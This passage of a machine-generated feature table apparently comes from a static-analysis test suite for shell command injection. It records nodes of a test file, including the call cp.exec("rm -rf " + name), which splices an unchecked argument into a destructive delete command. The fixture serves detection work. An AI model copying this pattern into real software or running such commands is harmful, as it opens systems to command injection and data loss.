autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:8 | cp.exec | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:26 | cp.exec ... + name) | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:5:20:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:5:20:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:5:20:8 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:5:20:8 | exec | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:5:20:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:10:20:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:10:20:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:10:20:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:10:20:18 | "rm -rf " | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:10:20:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:10:20:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:10:20:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:10:20:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:10:20:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:10:20:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:10:20:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:10:20:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:10:20:25 | "rm -rf " + name | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:10:20:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:10:20:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:22:20:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:22:20:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:22:20:25 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:22:20:25 | name | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:22:20:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:22:20:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:1:22:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:1:22:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:1:22:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:1:22:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:1:22:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:1:22:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:1:22:26 | module. ... w cla() | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:1:22:26 | module. ... w cla() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:1:22:26 | module. ... w cla() | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:8:22:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:8:22:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:8:22:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:18:22:26 | exceptional return of new cla() | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:18:22:26 | exceptional return of new cla() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:18:22:26 | exceptional return of new cla() | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:18:22:26 | new cla() | assignedToPropName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:18:22:26 | new cla() | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:18:22:26 | new cla() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:18:22:26 | new cla() | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:22:22:24 | cla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:22:22:24 | cla | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:22:22:22:24 | cla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:0 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:0 | this | enclosingFunctionName | cla2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:0 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:19 | 'arguments' object of function cla2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:19 | 'arguments' object of function cla2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:19 | 'arguments' object of function cla2 | enclosingFunctionName | cla2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:19 | 'arguments' object of function cla2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:19 | exceptional return of function cla2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:19 | exceptional return of function cla2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:19 | exceptional return of function cla2 | enclosingFunctionName | cla2 | +| 